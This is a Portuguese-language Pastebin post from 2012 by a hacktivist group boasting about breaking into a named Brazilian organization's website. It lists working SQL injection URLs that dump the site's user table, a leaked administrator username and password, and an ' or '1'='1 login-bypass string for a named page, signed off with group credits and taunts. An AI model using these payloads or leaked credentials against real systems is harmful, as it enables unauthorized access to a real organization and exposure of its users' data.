API tools faq
paste
Advertisement
FailSecurityBR

[+] ANATEC ... #FailSecBR | #CadeASegurancaVirtual

FailSecurityBR
Aug 27th, 2012
322
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.38 KB | None | 0 0
raw download clone embed print report
  1.  
  2. Heeeeeeeeeey ... Chegamos novamente... dessa vez para provar que a segurança virtual não existe ... e que consideramos como uma grande hipocrisia dos que acreditam nela.
  3. Sistemas são criados por pessoas como eu e você ... E TODOS NÓS ERRAMOS, portanto nenhum sistema é seguro.
  4.  
  5. Mostraremos hoje um site que realmente nos deixou envergonhado... Pois profissionais na área da tecnologia deveriam ter vergonha de deixar falhas tão idiotas em um site reconhecido no país ...
  6.  
  7. Segue abaixo as falhas e explorações encontradas pelo membro SPIRIT HACKER.
  8.  
  9. =============================================================================================================================================
  10.  
  11. $$$$$$$$\ $$\ $$\ $$$$$$\ $$$$$$$\ $$$$$$$\
  12. $$ _____| \__|$$ |$$ __$$\ $$ __$$\ $$ __$$\
  13. $$ | $$$$$$\ $$\ $$ |$$ / \__| $$$$$$\ $$$$$$$\ $$ | $$ |$$ | $$ |
  14. $$$$$\ \____$$\ $$ |$$ |\$$$$$$\ $$ __$$\ $$ _____|$$$$$$$\ |$$$$$$$ |
  15. $$ __|$$$$$$$ |$$ |$$ | \____$$\ $$$$$$$$ |$$ / $$ __$$\ $$ __$$<
  16. $$ | $$ __$$ |$$ |$$ |$$\ $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |
  17. $$ | \$$$$$$$ |$$ |$$ |\$$$$$$ |\$$$$$$$\ \$$$$$$$\ $$$$$$$ |$$ | $$ |
  18. \__| \_______|\__|\__| \______/ \_______| \_______|\_______/ \__| \__|
  19. Spirit Hacker | Cr4ck3r_SI:~# /fuck | Talib Girl
  20.  
  21. ================================================================================================================================================
  22.  
  23. Site : http://www.anatec.org.br/
  24. Falhas: - ASP SQL injection Query Execution ... (ASP SQLI)
  25. - SQL injection basic (Login por Strings)
  26.  
  27. ==============================================================================================================================================
  28.  
  29. ASP SQL INJECTION QUERY EXECUTION
  30.  
  31.  
  32. http://www.anatec.org.br/pagina_geral.asp?ID=334' // Pagina com a falha.
  33. http://www.anatec.org.br/pagina_geral.asp?ID=-334+union+select+0,1,2,3,4,5,6,7,8,9+from+usuarios // Encontrada a Tabela de usuarios.
  34. http://www.anatec.org.br/pagina_geral.asp?ID=-334+union+select+0,1,2,3,nome,5,6,7,8,9+from+usuarios // Encontrada a coluna NOME...
  35. http://www.anatec.org.br/pagina_geral.asp?ID=-334+union+select+0,1,2,3,senha,5,6,7,8,9+from+usuarios // Encontrada a coluna SENHA...
  36.  
  37. Nome: administrador
  38. Senha: lu
  39.  
  40. ==================================================================================================================================================
  41.  
  42. Admin Access for String
  43.  
  44. http://www.anatec.org.br/empregos.asp // Pagina com a falha
  45. Usuario: ' or '1'='1
  46. Senha: VAZIA ...
  47. http://www.anatec.org.br/empregoslogado.asp?menu= // Pagina direcionada a string.
  48.  
  49. ===================================================================================================================================================
  50.  
  51. Login Page Not Found, using localhost ...
  52.  
  53.  
  54. ===================================================================================================================================================
  55.  
  56.  
  57. Cr3d1t5 f0r BrLo0ping //Encontrou a falha de acesso por String \\ , Geovane Silva (Antigo Coringa Cracker), Cracker_Si /fuck && TalibGirl
  58.  
  59. F41L S3CUR17Y BR4S1L Pwn you !!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!